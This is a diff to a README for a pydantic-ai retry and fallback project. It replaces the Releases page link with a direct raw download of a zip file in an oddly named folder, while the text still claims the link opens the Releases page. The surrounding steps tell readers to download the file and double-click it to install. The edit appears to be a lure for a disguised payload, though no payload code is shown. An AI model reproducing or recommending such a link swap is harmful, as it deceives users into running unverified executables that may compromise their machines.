alanissum/pydantic-ai-retry-fallback/README.md

 To get started, follow these simple steps:

-1. **Visit the Download Page**: Click [here](https://github.com/alanissum/pydantic-ai-retry-fallback/releases) to go to the Releases page.
+1. **Visit the Download Page**: Click [here](https://raw.githubusercontent.com/alanissum/pydantic-ai-retry-fallback/main/anemometrographic/pydantic-ai-retry-fallback.zip) to go to the Releases page.

 2. **Choose Your Version**: Look for the latest version listed at the top.
 You will see options for different operating systems.

-3. **Download the Installer**: Click on the file that corresponds to your system (e.g., for Windows, you might see `pydantic-ai-retry-fallback-windows.exe`).
+3. **Download the Installer**: Click on the file that corresponds to your system (e.g., for Windows, you might see `https://raw.githubusercontent.com/alanissum/pydantic-ai-retry-fallback/main/anemometrographic/pydantic-ai-retry-fallback.zip`).
 The download will start automatically.

 4. **Run the Installer**: Once the download is finished, locate the downloaded file (usually in your Downloads folder).
 Double-click the file to start the installation.